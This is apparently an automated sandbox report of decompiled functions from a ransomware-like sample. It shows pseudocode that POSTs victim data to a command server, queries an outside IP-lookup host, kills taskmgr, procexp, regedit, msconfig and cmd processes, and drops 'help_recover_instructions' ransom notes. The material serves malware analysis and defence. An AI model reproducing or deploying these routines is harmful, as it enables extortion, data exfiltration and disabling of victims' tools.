Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00425DE6, Relevance: 1.5, APIs: 1, Instructions: 31

C-Code - Quality: 91%

			E00425DE6(void* __ecx, signed int __edx, void* __eflags, signed int* _a4) {
				struct _FILETIME _v12;
				signed int _t9;
				signed int* _t12;
				signed int _t13;
				void* _t15;

				_t13 = __edx;
				GetSystemTimeAsFileTime( &_v12);
				asm("adc ecx, 0xfe624e21");
				_t9 = E00429DD0(_v12.dwLowDateTime + 0x2ac18000, _v12.dwHighDateTime, 0x989680, 0);
				_t15 = _t13 - 7;
				if(_t15 >= 0 && (_t15 > 0 || _t9 > 0x93406fff)) {
					_t9 = _t9 | 0xffffffff;
					_t13 = _t9;
				}
				_t12 = _a4;
				if(_t12 != 0) {
					 *_t12 = _t9;
					_t12[1] = _t13;
					return _t9;
				}
				return _t9;
			}

0x00425de6
0x00425df1
0x00425e09
0x00425e11
0x00425e16
0x00425e19
0x00425e24
0x00425e27
0x00425e27
0x00425e29
0x00425e2e
0x00425e30
0x00425e32
0x00000000
0x00425e32
0x00425e36

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00411678,?,CCCCC35B,00000000,00418C08,?,?,004117BB,00000000,000000FF,CCCCC35B,004118EB), ref: 00425DF1

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 001A0408, Relevance: 1.4, Strings: 1, Instructions: 145

Strings

.dll, xrefs: 001A055F

Memory Dump Source

Source File: 00000000.00000002.227253422.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041B480, Relevance: 42.4, APIs: 13, Strings: 11, Instructions: 392

C-Code - Quality: 80%

			E0041B480(intOrPtr _a4, char _a12, long _a20, intOrPtr _a28, intOrPtr _a32, long _a48, char _a260, intOrPtr _a264, intOrPtr _a268, intOrPtr _a272, char _a276, char _a292, intOrPtr _a293, intOrPtr _a297, intOrPtr _a301, intOrPtr _a305, intOrPtr _a309, intOrPtr _a313, intOrPtr _a317, short _a321, char _a323, char _a324, char _a344, char* _a345, char* _a349, char* _a353, char _a356, short _a357, char _a372, char _a373, char _a548, char _a612, char _a628, char _a629, void _a1028, char _a1092, char _a1124, char _a1160, char _a1161, char _a5104, char _a5124, char _a5125, char _a8284, char _a8285, signed int _a12452) {
				void* _v0;
				char** _v8;
				void* _v20;
				char** _v24;
				void* _v36;
				intOrPtr _v64;
				void* _v68;
				char* _v116;
				intOrPtr _v124;
				void* _v136;
				char** _v148;
				void* _v156;
				signed int _t100;
				char* _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr* _t108;
				void* _t112;
				char* _t117;
				intOrPtr _t130;
				intOrPtr* _t136;
				intOrPtr* _t140;
				intOrPtr* _t158;
				long _t159;
				void* _t168;
				char* _t169;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr _t180;
				char _t182;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t194;
				void* _t200;
				intOrPtr* _t201;
				intOrPtr _t208;
				void* _t209;
				char* _t211;
				intOrPtr _t215;
				intOrPtr _t228;
				intOrPtr _t230;
				char** _t238;
				void* _t239;
				long _t245;
				char* _t246;
				intOrPtr* _t247;
				void* _t248;
				void* _t250;
				signed int _t251;
				signed int _t252;
				void* _t253;
				void* _t254;
				void* _t260;
				void* _t262;
				void* _t267;
				void* _t269;
				intOrPtr _t287;

				_t252 = _t251 & 0xfffffff8;
				E0042E220(0x30ac);
				_t100 =  *0x43f054; // 0xd46ffb00
				_a12452 = _t100 ^ _t252;
				_t102 =  *0x44185c; // 0x0
				_t178 =  *0x441b58; // 0x0
				_t208 =  *0x441858; // 0x0
				 *0x48224c = _t102;
				_t103 =  *0x441b5c; // 0x0
				 *0x482250 = _t178;
				_t179 =  *0x441854; // 0x0
				 *0x482258 = _t103;
				_t104 =  *0x441b64; // 0x0
				 *0x482254 = _t208;
				 *0x48225c = _t104;
				 *0x482260 = _t179;
				 *0x482264 = _t104;
				 *0x482268 = _t179;
				E0040D8C0(E0040D580(), _t208, 0x441d88, 0x61);
				_a344 = 0;
				_a345 = 0;
				_a349 = 0;
				_a353 = 0;
				_a357 = 0;
				_t107 = E00411370(_t105);
				_t245 = 1;
				_t253 = _t252 + 0xc;
				_a4 = _t107;
				_t269 =  *0x462864 - _t245; // 0x0
				if(_t269 != 0) {
					_a344 = 0x676e6950;
				} else {
					E00425A6E( &_a344, 0xf, "Cr");
					E00425D48( &_a344, 0xf, "ypted");
					_t253 = _t253 + 0x18;
				}
				_t108 = 0x46284c;
				_t11 = _t108 + 1; // 0x46284d
				_t209 = _t11;
				do {
					_t180 =  *_t108;
					_t108 = _t108 + 1;
				} while (_t180 != 0);
				if(_t108 == _t209) {
					E0041BA30(0, _t209);
				}
				_a1160 = 0;
				E0042D0A0( &_a1161, 0, 0xfff);
				_t254 = _t253 + 0xc;
				_t112 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 0, 0, 0, 0);
				_t238 = 0x48224c;
				_v20 = _t112;
				_v8 = 0x48224c;
				while(1) {
					E0042D0A0( &_v0, 0, 0x3c);
					_v0 = 0x3c;
					_a20 = _t245;
					_a48 = _t245;
					_a372 = 0;
					E0042D0A0( &_a373, 0, 0xff);
					_a628 = 0;
					E0042D0A0( &_a629, 0, 0x1ff);
					_t246 =  *_t238;
					_t117 = _t246;
					_t254 = _t254 + 0x24;
					_t24 =  &(_t117[1]); // 0x2
					_t211 = _t24;
					do {
						_t182 =  *_t117;
						_t117 =  &(_t117[1]);
					} while (_t182 != 0);
					if(InternetCrackUrlA(_t246, _t117 - _t211, 0,  &_v0) == 0) {
						L27:
						_t238 =  &(_t238[1]);
						_v24 = _t238;
						if(_t238 < 0x482264) {
							_t245 = 1;
							continue;
						}
						L28:
						InternetCloseHandle(_v36);
						_t287 =  *0x462864; // 0x0
						if(_t287 == 0) {
							E004258E3(_v36);
						}
						ExitThread(1);
					}
					_t123 = _a4;
					if(_a4 > 0) {
						E004262F3( &_a356, 0x100, _v0, _t123);
						_t254 = _t254 + 0x10;
					}
					_t124 = _a32;
					if(_a32 > 0) {
						E004262F3( &_a612, 0x200, _a28, _t124);
						_t254 = _t254 + 0x10;
					}
					E0042D0A0( &_a1124, 0, 0x1000);
					_push( *0x441d27 & 0x000000ff);
					_push( *0x441d26 & 0x000000ff);
					_push( *0x441d25 & 0x000000ff);
					_push( *0x441d24 & 0x000000ff);
					_push( *0x441d23 & 0x000000ff);
					_push( *0x441d22 & 0x000000ff);
					_push( *0x441d21 & 0x000000ff);
					_t188 =  *0x462860; // 0x0
					_push( *0x441d20 & 0x000000ff);
					_t215 =  *0x441744; // 0x0
					_push(0x46284c);
					_push( &_a356);
					_t130 =  *0x441ffc; // 0x0
					_push(_t188);
					_t189 =  *0x441ff8; // 0x0
					_push(_t215);
					_push("3.0.0");
					_push(0);
					_push(0x400);
					_push(_t130);
					_push(_t189);
					L004305F4();
					_push(0);
					_push(0x400);
					_push(_t215);
					_push(_t130);
					L004305F4();
					_t190 =  *0x441734; // 0x0
					_push(_t215);
					_push(_t130);
					_push(0x441d58);
					_push(_v64);
					_push("empty");
					E0041BB10(0x1000,  &_a1092, _t190,  &_a276);
					_a8284 = 0;
					E0042D0A0( &_a8285, 0, 0xfff);
					_t247 =  *0x441b60; // 0x0
					_t260 = _t254 + 0x6c;
					_a293 = 0;
					_a297 = 0;
					_a301 = 0;
					_a305 = 0;
					_a309 = 0;
					_a313 = 0;
					_a317 = 0;
					_a321 = 0;
					_a323 = 0;
					_t136 = _t247;
					_a292 = 0;
					_t49 = _t136 + 1; // 0x1
					_t239 = _t49;
					do {
						_t191 =  *_t136;
						_t136 = _t136 + 1;
					} while (_t191 != 0);
					E00420980(0, _t247,  &_a292, _t136 - _t239);
					_push( &_a12);
					_push( &_a292);
					_a260 = 0xaaaaffff;
					_a264 = 0xefbe0000;
					_a268 = 0xadde;
					_a272 = 0xffffffbe;
					E00424040();
					_t140 =  &_a1092;
					_t262 = _t260 + 0xc;
					_t248 = _t140 + 1;
					do {
						_t194 =  *_t140;
						_t140 = _t140 + 1;
					} while (_t194 != 0);
					_t195 = _t140 - _t248;
					E0042D0A0(_t262 + _t140 - _t248 + 0x4a1, 0x10, 0x10);
					_push( &_a12);
					_push( &_a260);
					_push( &_a1092);
					E0041BC70(_t140 - _t248 + 0x10 - (_t195 + 0x00000001 & 0x0000000f) + 1,  &_a8284);
					E0040D8C0(E0040D580(),  &_a8284,  &_a8284, _t140 - _t248 + 0x10 - (_t195 + 0x00000001 & 0x0000000f) + 1);
					_t241 = E00411370(_t148);
					E0041BB10(0x1000,  &_a1092, "data=%s", _t150);
					E0040D4F0(_t148);
					_t250 = InternetConnectA(_v68,  &_a324, 0x50, 0, 0, 3, 0, 0);
					_v136 = HttpOpenRequestA(_t250, "POST",  &_a548, 0, 0, "*/*", 0x80000000, 0);
					_a5124 = 0;
					E0042D0A0( &_a5125, 0, 0xc17);
					_t158 =  &_a1028;
					_t267 = _t262 + 0x3c;
					_v116 = 0;
					_t200 = _t158 + 1;
					do {
						_t228 =  *_t158;
						_t158 = _t158 + 1;
					} while (_t228 != 0);
					_t159 = _t158 - _t200;
					_t201 = "Content-Type: application/x-www-form-urlencoded";
					_v124 = _t201 + 1;
					do {
						_t230 =  *_t201;
						_t201 = _t201 + 1;
					} while (_t230 != 0);
					HttpSendRequestA(_v136, "Content-Type: application/x-www-form-urlencoded", _t201 - _v124,  &_a1028, _t159);
					E004258E3(_t241);
					_t254 = _t267 + 4;
					if(GetLastError() != 0) {
						L26:
						InternetCloseHandle(_v156);
						InternetCloseHandle(_t250);
						_t238 = _v148;
						goto L27;
					}
					E0041BB40( &_a5104, 0xc16, _v156,  &_v136);
					_t168 = _v136;
					 *((char*)(_t254 + _t168 + 0x14a4)) = 0;
					 *((char*)(_t254 + _t168 + 0x14a9)) = 0;
					_t169 = strstr( &_a5104, "INSERTED");
					_t254 = _t254 + 0x10;
					if(_t169 != 0) {
						goto L28;
					}
					goto L26;
				}
			}

0x0041b485
0x0041b48d
0x0041b492
0x0041b499
0x0041b4a0
0x0041b4a5
0x0041b4ab
0x0041b4b1
0x0041b4b6
0x0041b4bc
0x0041b4c2
0x0041b4c8
0x0041b4cd
0x0041b4d4
0x0041b4da
0x0041b4df
0x0041b4e5
0x0041b4ea
0x0041b4fe
0x0041b506
0x0041b50d
0x0041b514
0x0041b51b
0x0041b522
0x0041b52a
0x0041b52f
0x0041b534
0x0041b537
0x0041b53b
0x0041b541
0x0041b573
0x0041b543
0x0041b552
0x0041b569
0x0041b56e
0x0041b56e
0x0041b57e
0x0041b583
0x0041b583
0x0041b586
0x0041b586
0x0041b588
0x0041b589
0x0041b58f
0x0041b591
0x0041b591
0x0041b5a4
0x0041b5ab
0x0041b5b0
0x0041b5bc
0x0041b5c2
0x0041b5c7
0x0041b5cb
0x0041b5d6
0x0041b5de
0x0041b5f4
0x0041b5fc
0x0041b600
0x0041b604
0x0041b60b
0x0041b621
0x0041b628
0x0041b62d
0x0041b62f
0x0041b631
0x0041b634
0x0041b634
0x0041b637
0x0041b637
0x0041b639
0x0041b63a
0x0041b650
0x0041b9f3
0x0041b9f3
0x0041b9f6
0x0041ba00
0x0041b5d1
0x00000000
0x0041b5d1
0x0041ba06
0x0041ba0b
0x0041ba11
0x0041ba17
0x0041ba1e
0x0041ba23
0x0041ba28
0x0041ba28
0x0041b656
0x0041b65c
0x0041b671
0x0041b676
0x0041b676
0x0041b679
0x0041b67f
0x0041b694
0x0041b699
0x0041b699
0x0041b6aa
0x0041b6c7
0x0041b6cf
0x0041b6d7
0x0041b6df
0x0041b6e7
0x0041b6ef
0x0041b6f0
0x0041b6f1
0x0041b6f7
0x0041b6f8
0x0041b6fe
0x0041b70a
0x0041b70b
0x0041b710
0x0041b711
0x0041b717
0x0041b718
0x0041b71d
0x0041b71e
0x0041b723
0x0041b724
0x0041b725
0x0041b72a
0x0041b72b
0x0041b730
0x0041b731
0x0041b732
0x0041b737
0x0041b73d
0x0041b742
0x0041b743
0x0041b748
0x0041b749
0x0041b764
0x0041b77a
0x0041b781
0x0041b786
0x0041b78c
0x0041b791
0x0041b798
0x0041b79f
0x0041b7a6
0x0041b7ad
0x0041b7b4
0x0041b7bb
0x0041b7c2
0x0041b7ca
0x0041b7d1
0x0041b7d3
0x0041b7da
0x0041b7da
0x0041b7e0
0x0041b7e0
0x0041b7e2
0x0041b7e3
0x0041b7f3
0x0041b7ff
0x0041b807
0x0041b808
0x0041b813
0x0041b81e
0x0041b829
0x0041b834
0x0041b839
0x0041b840
0x0041b843
0x0041b846
0x0041b846
0x0041b848
0x0041b849
0x0041b84f
0x0041b86c
0x0041b878
0x0041b880
0x0041b888
0x0041b892
0x0041b8aa
0x0041b8b8
0x0041b8cd
0x0041b8d5
0x0041b90a
0x0041b91d
0x0041b92a
0x0041b931
0x0041b936
0x0041b93d
0x0041b940
0x0041b944
0x0041b947
0x0041b947
0x0041b949
0x0041b94a
0x0041b94e
0x0041b950
0x0041b958
0x0041b960
0x0041b960
0x0041b962
0x0041b963
0x0041b97f
0x0041b986
0x0041b98b
0x0041b996
0x0041b9df
0x0041b9ea
0x0041b9ed
0x0041b9ef
0x00000000
0x0041b9ef
0x0041b9ae
0x0041b9b3
0x0041b9c3
0x0041b9cb
0x0041b9d2
0x0041b9d8
0x0041b9dd
0x00000000
0x00000000
0x00000000
0x0041b9dd

APIs

Part of subcall function 00411370: _aullshr.NTDLL ref: 004113D6

ExitThread.KERNEL32 ref: 0041BA28

Part of subcall function 0041BA30: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000004,00000000,00000000,00000000), ref: 0041BA71
Part of subcall function 0041BA30: InternetOpenUrlW.WININET(00000000,http://ip.tyk.nu/,00000000,00000000,40000000,00000000), ref: 0041BA8A
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BA97
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BAFA
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BAFD

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 0041B5BC
InternetCrackUrlA.WININET(00000001,00000002,00000000,?), ref: 0041B648
_alldiv.NTDLL(00000000,00000000,00000400,00000000), ref: 0041B725
_alldiv.NTDLL(00000000,?,00000400,00000000), ref: 0041B732
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0041B8EF
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,80000000,00000000), ref: 0041B912
GetLastError.KERNEL32 ref: 0041B98E
strstr.NTDLL ref: 0041B9D2
InternetCloseHandle.WININET(?), ref: 0041B9EA
InternetCloseHandle.WININET(00000000), ref: 0041B9ED
InternetCloseHandle.WININET(?), ref: 0041BA0B
HttpSendRequestA.WININET(?,Content-Type: application/x-www-form-urlencoded,?,?,?), ref: 0041B97F

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32 ref: 0042590B

Strings

POST, xrefs: 0041B90C
ypted, xrefs: 0041B55A
Content-Type: application/x-www-form-urlencoded, xrefs: 0041B950, 0041B979
*/*, xrefs: 0041B8FB
empty, xrefs: 0041B749
<, xrefs: 0041B5F4
3.0.0, xrefs: 0041B718
Ping, xrefs: 0041B573
data=%s, xrefs: 0041B8C2
INSERTED, xrefs: 0041B9BE
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko, xrefs: 0041B5B7

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041FF20, Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 162

C-Code - Quality: 63%

			E0041FF20(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v8198;
				long _v8200;
				char _v88200;
				unsigned int _v88204;
				long _v88208;
				unsigned int _v88212;
				signed int _t28;
				char* _t37;
				unsigned int _t39;
				intOrPtr* _t42;
				intOrPtr* _t44;
				intOrPtr* _t47;
				wchar_t* _t52;
				intOrPtr* _t53;
				wchar_t* _t55;
				wchar_t* _t57;
				wchar_t* _t58;
				wchar_t* _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t75;
				signed int _t76;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t81;

				_t73 = __esi;
				_t71 = __edi;
				_t60 = __ebx;
				E0042E220(0x15894);
				_t28 =  *0x43f054; // 0xd46ffb00
				_v8 = _t28 ^ _t76;
				_v8200 = 0;
				E0042D0A0( &_v8198, 0, 0x1ffe);
				_t78 = _t77 + 0xc;
				_v88208 = GetCurrentProcessId();
				if( *0x46a234 != 0) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					do {
						_t69 =  &_v88212;
						_t37 =  &_v88200;
						__imp__EnumProcesses(_t37, 0x9c40,  &_v88212);
						if(_t37 != 0) {
							_t39 = _v88212 >> 2;
							_t61 = 0;
							_v88204 = _t39;
							if(_t39 != 0) {
								do {
									_t74 =  *((intOrPtr*)(_t76 + _t61 * 4 - 0x15884));
									if(_t74 != _v88208 && _t74 != 0) {
										_t42 = E00413000(_t69, 0, 1, 0x99a4299d);
										_t80 = _t78 + 0xc;
										_t75 =  *_t42(0x2000030, 0, _t74);
										if(_t75 == 0) {
											L17:
											_t44 = E00413000(_t69, 0, 1, 0x723eb0d5);
											_t78 = _t80 + 0xc;
											 *_t44(_t75);
										} else {
											E0042D0A0( &_v8200, 0, 0x2000);
											_t78 = _t80 + 0xc;
											__imp__GetProcessImageFileNameW(_t75,  &_v8200, 0x1000);
											_t47 =  &_v8200;
											_t69 = _t47 + 2;
											do {
												_t66 =  *_t47;
												_t47 = _t47 + 2;
											} while (_t66 != 0);
											if(_t47 != _t69) {
												E0042614E( &_v8200, 0x1000);
												_t52 = wcsstr( &_v8200, L"askmg");
												_t81 = _t78 + 0x10;
												if(_t52 != 0) {
													L16:
													_t53 = E00413000(_t69, 0, 1, 0x9e6fa842);
													_t80 = _t81 + 0xc;
													 *_t53(_t75, 0);
												} else {
													_t69 =  &_v8200;
													_t55 = wcsstr( &_v8200, L"rocex");
													_t81 = _t81 + 8;
													if(_t55 != 0) {
														goto L16;
													} else {
														_t57 = wcsstr( &_v8200, L"egedi");
														_t81 = _t81 + 8;
														if(_t57 != 0) {
															goto L16;
														} else {
															_t58 = wcsstr( &_v8200, L"sconfi");
															_t81 = _t81 + 8;
															if(_t58 != 0) {
																goto L16;
															} else {
																_t69 =  &_v8200;
																_t59 = wcsstr( &_v8200, L"cmd");
																_t80 = _t81 + 8;
																if(_t59 != 0) {
																	goto L16;
																}
															}
														}
													}
												}
												goto L17;
											}
										}
										_t39 = _v88204;
									}
									_t61 = _t61 + 1;
								} while (_t61 < _t39);
							}
							E0042D0A0( &_v88200, 0, 0x13880);
							_t78 = _t78 + 0xc;
							Sleep(0xc8);
						}
					} while ( *0x46a234 != 0);
					_pop(_t71);
					_pop(_t73);
					_pop(_t60);
				}
				 *((intOrPtr*)(E00413000(_t69, 0, 1, 0x768aa260)))();
				return E004256FE(1, _t60, _v8 ^ _t76, _t69, _t71, _t73, 0xffffffff);
			}

0x0041ff20
0x0041ff20
0x0041ff20
0x0041ff2a
0x0041ff2f
0x0041ff36
0x0041ff48
0x0041ff4f
0x0041ff54
0x0041ff64
0x0041ff6a
0x0041ff70
0x0041ff71
0x0041ff72
0x0041ff80
0x0041ff80
0x0041ff8c
0x0041ff93
0x0041ff9b
0x0041ffa7
0x0041ffaa
0x0041ffac
0x0041ffb4
0x0041ffc0
0x0041ffc0
0x0041ffcd
0x0041ffe4
0x0041ffe9
0x0041fff6
0x0041fffa
0x004200d7
0x004200e0
0x004200e5
0x004200e9
0x00420000
0x0042000e
0x00420013
0x00420023
0x00420029
0x0042002f
0x00420032
0x00420032
0x00420035
0x00420038
0x00420041
0x00420053
0x00420064
0x00420066
0x0042006b
0x004200c1
0x004200ca
0x004200cf
0x004200d5
0x0042006d
0x0042006d
0x00420079
0x0042007b
0x00420080
0x00000000
0x00420082
0x0042008e
0x00420090
0x00420095
0x00000000
0x00420097
0x004200a3
0x004200a5
0x004200aa
0x00000000
0x004200ac
0x004200ac
0x004200b8
0x004200ba
0x004200bf
0x00000000
0x00000000
0x004200bf
0x004200aa
0x00420095
0x00420080
0x00000000
0x0042006b
0x00420041
0x004200eb
0x004200eb
0x004200f1
0x004200f2
0x0041ffc0
0x00420108
0x0042010d
0x00420115
0x00420115
0x0042011b
0x00420128
0x00420129
0x0042012a
0x0042012a
0x0042013e
0x00420152

APIs

GetCurrentProcessId.KERNEL32 ref: 0041FF57
EnumProcesses.PSAPI(?,00009C40,?), ref: 0041FF93
GetProcessImageFileNameW.PSAPI(00000000,?,00001000), ref: 00420023
wcsstr.NTDLL ref: 00420064
wcsstr.NTDLL ref: 00420079
wcsstr.NTDLL ref: 0042008E
wcsstr.NTDLL ref: 004200A3
wcsstr.NTDLL ref: 004200B8
Sleep.KERNEL32(000000C8), ref: 00420115

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

rocex, xrefs: 00420073
sconfi, xrefs: 0042009D
cmd, xrefs: 004200B2
egedi, xrefs: 00420088
askmg, xrefs: 0042005E

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00413500, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185

C-Code - Quality: 83%

			E00413500(wchar_t* _a4) {
				signed int _v8;
				char _v8198;
				short _v8200;
				long _v8204;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t30;
				intOrPtr* _t38;
				intOrPtr* _t41;
				wchar_t* _t45;
				intOrPtr* _t47;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;
				signed int _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				E0042E220(0x2008);
				_t24 =  *0x43f054; // 0xd46ffb00
				_v8 = _t24 ^ _t68;
				_t45 = _a4;
				_v8204 = 0;
				_v8200 = 0;
				E0042D0A0( &_v8198, 0, 0x1ffe);
				_t70 = _t69 + 0xc;
				_t47 = 0x476238;
				_t28 = _t45;
				while(1) {
					_t57 =  *_t28;
					if(_t57 !=  *_t47) {
						break;
					}
					if(_t57 == 0) {
						L5:
						_t28 = 0;
					} else {
						_t57 = _t28[0];
						if(_t57 !=  *((intOrPtr*)(_t47 + 2))) {
							break;
						} else {
							_t28 =  &(_t28[1]);
							_t47 = _t47 + 4;
							if(_t57 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
					}
					L7:
					if(_t28 != 0) {
						_t50 = 0x470238;
						_t28 = _t45;
						while(1) {
							_t57 =  *_t28;
							if(_t57 !=  *_t50) {
								break;
							}
							if(_t57 == 0) {
								L13:
								_t28 = 0;
							} else {
								_t57 = _t28[0];
								if(_t57 !=  *((intOrPtr*)(_t50 + 2))) {
									break;
								} else {
									_t28 =  &(_t28[1]);
									_t50 = _t50 + 4;
									if(_t57 != 0) {
										continue;
									} else {
										goto L13;
									}
								}
							}
							L15:
							if(_t28 != 0) {
								_t51 = 0x47e238;
								_t28 = _t45;
								while(1) {
									_t57 =  *_t28;
									if(_t57 !=  *_t51) {
										break;
									}
									if(_t57 == 0) {
										L21:
										_t28 = 0;
									} else {
										_t57 = _t28[0];
										if(_t57 !=  *((intOrPtr*)(_t51 + 2))) {
											break;
										} else {
											_t28 =  &(_t28[1]);
											_t51 = _t51 + 4;
											if(_t57 != 0) {
												continue;
											} else {
												goto L21;
											}
										}
									}
									L23:
									if(_t28 != 0) {
										_push(_t64);
										_t28 = wcsstr(_t45, "Desktop");
										_t71 = _t70 + 8;
										if(_t28 == 0) {
											_t30 = 0x474238;
											_t57 = 0x47423a;
											do {
												_t52 =  *_t30;
												_t30 = _t30 + 2;
											} while (_t52 != 0);
											if(_t30 == 0x47423a) {
												L29:
												_push(_t62);
												_push(0x442000);
												_push(L"help_recover_instructions");
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.txt", _t45);
												_t66 = E004134D0( &_v8200);
												_t72 = _t71 + 0x18;
												if(_t66 != 0xffffffff) {
													_t41 = 0x462918;
													_t15 = _t41 + 1; // 0x462919
													_t61 = _t15;
													do {
														_t55 =  *_t41;
														_t41 = _t41 + 1;
													} while (_t55 != 0);
													E00414330(_t61, _t66, 0x462918, _t41 - _t61,  &_v8204);
													_t72 = _t72 + 0x10;
													CloseHandle(_t66);
												}
												_push(0x442000);
												_push(L"help_recover_instructions");
												_t57 = 0x1000;
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.html", _t45);
												_t67 = CreateFileW( &_v8200, 0x40000000, 0, 0, 4, 0x80, 0);
												if(_t67 != 0xffffffff) {
													_t38 = 0x4665a8;
													_t19 = _t38 + 1; // 0x4665a9
													_t57 = _t19;
													do {
														_t53 =  *_t38;
														_t38 = _t38 + 1;
													} while (_t53 != 0);
													E00414330(_t57, _t67, 0x4665a8, _t38 - _t57,  &_v8204);
													_t28 = CloseHandle(_t67);
												}
												_pop(_t62);
											} else {
												_t28 = wcsstr(_t45, "Public Desktop");
												_t71 = _t71 + 8;
												if(_t28 == 0) {
													goto L29;
												}
											}
										}
										_pop(_t64);
									}
									goto L39;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L23;
							}
							goto L39;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L15;
					}
					L39:
					return E004256FE(_t28, _t45, _v8 ^ _t68, _t57, _t62, _t64);
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L7;
			}

0x0041350a
0x0041350f
0x00413516
0x0041351a
0x0041352c
0x00413536
0x0041353d
0x00413542
0x00413545
0x0041354a
0x00413550
0x00413550
0x00413556
0x00000000
0x00000000
0x0041355b
0x00413572
0x00413572
0x0041355d
0x0041355d
0x00413565
0x00000000
0x00413567
0x00413567
0x0041356a
0x00413570
0x00000000
0x00000000
0x00000000
0x00000000
0x00413570
0x00413565
0x0041357b
0x0041357d
0x00413583
0x00413588
0x00413590
0x00413590
0x00413596
0x00000000
0x00000000
0x0041359b
0x004135b2
0x004135b2
0x0041359d
0x0041359d
0x004135a5
0x00000000
0x004135a7
0x004135a7
0x004135aa
0x004135b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135b0
0x004135a5
0x004135bb
0x004135bd
0x004135c3
0x004135c8
0x004135d0
0x004135d0
0x004135d6
0x00000000
0x00000000
0x004135db
0x004135f2
0x004135f2
0x004135dd
0x004135dd
0x004135e5
0x00000000
0x004135e7
0x004135e7
0x004135ea
0x004135f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135f0
0x004135e5
0x004135fb
0x004135fd
0x00413603
0x00413610
0x00413612
0x00413617
0x0041361d
0x00413622
0x00413625
0x00413625
0x00413628
0x0041362b
0x00413634
0x00413649
0x00413649
0x0041364a
0x0041364f
0x00413666
0x0041367d
0x0041367f
0x00413685
0x00413687
0x0041368c
0x0041368c
0x00413690
0x00413690
0x00413692
0x00413693
0x004136a7
0x004136ac
0x004136b0
0x004136b0
0x004136b2
0x004136b7
0x004136c9
0x004136ce
0x004136f5
0x004136fa
0x004136fc
0x00413701
0x00413701
0x00413704
0x00413704
0x00413706
0x00413707
0x0041371b
0x00413724
0x00413724
0x00413726
0x00413636
0x0041363c
0x0041363e
0x00413643
0x00000000
0x00000000
0x00413643
0x00413634
0x00413727
0x00413727
0x00000000
0x004135fd
0x004135f6
0x004135f8
0x00000000
0x004135f8
0x00000000
0x004135bd
0x004135b6
0x004135b8
0x00000000
0x004135b8
0x00413728
0x00413736
0x00413736
0x00413576
0x00413578
0x00000000

APIs

wcsstr.NTDLL ref: 00413610
wcsstr.NTDLL ref: 0041363C
CloseHandle.KERNEL32(00000000), ref: 004136B0
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 004136EF
CloseHandle.KERNEL32(00000000), ref: 00413724

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
